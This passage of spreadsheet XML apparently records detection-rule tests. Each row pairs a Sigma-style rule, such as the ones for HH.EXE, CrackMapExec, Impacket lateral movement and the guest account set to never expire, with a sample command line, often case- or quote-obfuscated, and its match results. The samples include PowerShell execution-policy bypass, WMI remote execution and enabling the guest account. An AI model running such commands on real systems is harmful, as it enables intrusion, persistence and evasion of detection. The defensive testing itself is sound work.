          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1303" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1303" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1303" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1303" s="43" t="n"/>
      <c r="J1303" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1303" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1304" ht="15.75" customHeight="1" s="42">
      <c r="A1304" s="43" t="n"/>
      <c r="B1304" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1304" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1304" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1304" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1304" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1304" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1304" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1304" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1305" ht="15.75" customHeight="1" s="42">
      <c r="A1305" s="43" t="n"/>
      <c r="B1305" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1305" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1305" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1305" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1305" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1305" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1305" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1305" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1306" ht="15.75" customHeight="1" s="42">
      <c r="A1306" s="43" t="n"/>
      <c r="B1306" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1306" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1306" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1306" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1306" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1306" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1306" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1306" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1307" ht="15.75" customHeight="1" s="42">
      <c r="A1307" s="43" t="n"/>
      <c r="B1307" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1307" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1307" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1307" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1307" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I130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307" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1307" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1308" ht="15.75" customHeight="1" s="42">
      <c r="A1308" s="43" t="n"/>
      <c r="B1308" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1308" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1308" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1308" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1308" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1308" s="43" t="n"/>
      <c r="J1308" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1308" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1309" ht="15.75" customHeight="1" s="42">
      <c r="A1309" s="43" t="n"/>
      <c r="B1309" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1309" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1309" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1309" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1309" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1309" s="43" t="n"/>
      <c r="J1309" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1309" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1310" ht="15.75" customHeight="1" s="42">
      <c r="A1310" s="43" t="n"/>
      <c r="B1310" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1310" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1310" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1310" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"C" 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F1310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1310" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1310" s="43" t="n"/>
      <c r="J1310" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1310" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1311" ht="15.75" customHeight="1" s="42">
      <c r="A1311" s="43" t="n"/>
      <c r="B1311" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1311" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1311" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1311" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -noni -w 1 -exec bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1311" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1311" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1311" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1311" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1311" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1312" ht="15.75" customHeight="1" s="42">
      <c r="A1312" s="43" t="n"/>
      <c r="B1312" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1312" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1312" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1312" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOp -noni -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1312" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1312" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1312" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1312" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1312" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1313" ht="15.75" customHeight="1" s="42">
      <c r="A1313" s="43" t="n"/>
      <c r="B1313" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1313" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1313" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1313" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOP -noni -W 1 -exec bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1313" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1313" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1313" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1313" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1313" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1314" ht="15.75" customHeight="1" s="42">
      <c r="A1314" s="43" t="n"/>
      <c r="B1314" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1314" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1314" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1314" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F1314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1314" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1314" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1314" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1314" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1314" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1315" ht="15.75" customHeight="1" s="42">
      <c r="A1315" s="43" t="n"/>
      <c r="B1315" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1315" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1315" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1315" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F1315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1315" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1315" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1315" s="4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J1315" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1315" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1316" ht="15.75" customHeight="1" s="42">
      <c r="A1316" s="43" t="n"/>
      <c r="B1316" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1316" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1316" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1316" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1316" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1316" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1316" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1316" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1316" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1316" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1317" ht="15.75" customHeight="1" s="42">
      <c r="A1317" s="43" t="n"/>
      <c r="B1317" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1317" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1317" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1317" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"C" "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1317" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1317" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1317" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1317" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1317" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1318" ht="15.75" customHeight="1" s="42">
      <c r="A1318" s="43" t="n"/>
      <c r="B1318" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C1318" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D1318" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E1318" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"C" "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F1318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1318" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1318" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1318" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J1318" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1318" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1319" ht="15.75" customHeight="1" s="42">
      <c r="A1319" s="43" t="n"/>
      <c r="B1319" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C1319" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D1319" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E1319" s="44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F1319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1319" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1319" s="43" t="n"/>
      <c r="J1319" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1319" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1320" ht="15.75" customHeight="1" s="42">
      <c r="A1320" s="43" t="n"/>
      <c r="B1320" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C1320" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D1320" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E1320" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WiNdoWsTYle Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F1320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1320" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1320" s="44" t="n"/>
      <c r="J1320" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1320" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1321" ht="15.75" customHeight="1" s="42">
      <c r="A1321" s="43" t="n"/>
      <c r="B1321" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C1321" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D1321" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E1321" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WINdowstyle Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F1321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1321" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1321" s="44" t="n"/>
      <c r="J1321" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1321" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1322" ht="15.75" customHeight="1" s="42">
      <c r="A1322" s="43" t="n"/>
      <c r="B1322" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C1322" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D1322" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E1322" s="44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F1322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1322" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1322" s="44" t="n"/>
      <c r="J1322" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1322" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1323" ht="15.75" customHeight="1" s="42">
      <c r="A1323" s="43" t="n"/>
      <c r="B1323" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1323" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1323" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1323" s="44" t="inlineStr">
        <is>
          <t>net user guest /active:yes /expires:never /passwordchg:no</t>
        </is>
      </c>
      <c r="F1323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1323" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1323" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1323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1323" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1323" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1324" ht="15.75" customHeight="1" s="42">
      <c r="A1324" s="43" t="n"/>
      <c r="B1324" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1324" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1324" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1324" s="44" t="inlineStr">
        <is>
          <t>net user guest /active:yes /eXpIrEs:neVEr /pAssworDchG:nO</t>
        </is>
      </c>
      <c r="F1324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1324" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1324" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1324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1324" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1324" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1325" ht="15.75" customHeight="1" s="42">
      <c r="A1325" s="43" t="n"/>
      <c r="B1325" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1325" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1325" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1325" s="44" t="inlineStr">
        <is>
          <t>net user guest /ActIve:yEs /expires:never /PaSSWOrDcHG:no</t>
        </is>
      </c>
      <c r="F1325" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1325" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1325" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1325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1325" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1325" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1326" ht="15.75" customHeight="1" s="42">
      <c r="A1326" s="43" t="n"/>
      <c r="B1326" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1326" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1326" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1326" s="44" t="inlineStr">
        <is>
          <t>net user guest -"active:yes" /expires:never /passwordchg:no</t>
        </is>
      </c>
      <c r="F1326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1326" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1326" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1326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1326" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1326" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1327" ht="15.75" customHeight="1" s="42">
      <c r="A1327" s="43" t="n"/>
      <c r="B1327" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1327" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1327" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1327" s="44" t="inlineStr">
        <is>
          <t>net user guest /"active:yes" /expires:never /"passwordchg:no"</t>
        </is>
      </c>
      <c r="F1327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1327" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1327" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1327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1327" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1327" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1328" ht="15.75" customHeight="1" s="42">
      <c r="A1328" s="43" t="n"/>
      <c r="B1328" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1328" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1328" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1328" s="44" t="inlineStr">
        <is>
          <t>net user guest -"active:yes" /EXPIReS:NEVer /passwordchg:no</t>
        </is>
      </c>
      <c r="F1328" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1328" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1328" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1328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28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1328" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1329" ht="15.75" customHeight="1" s="42">
      <c r="A1329" s="43" t="n"/>
      <c r="B1329" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1329" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1329" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1329" s="44" t="inlineStr">
        <is>
          <t>net user guest /active:yes -"expires:never" /passwordchg:no</t>
        </is>
      </c>
      <c r="F1329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1329" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1329" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1329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29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1329" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1330" ht="15.75" customHeight="1" s="42">
      <c r="A1330" s="43" t="n"/>
      <c r="B1330" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C1330" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D1330" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E1330" s="44" t="inlineStr">
        <is>
          <t>net user guest /aCTIve:yEs /EXPIrES:NeVEr -"passwordchg:no"</t>
        </is>
      </c>
      <c r="F1330" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1330" s="44" t="b">
        <v>1</v>
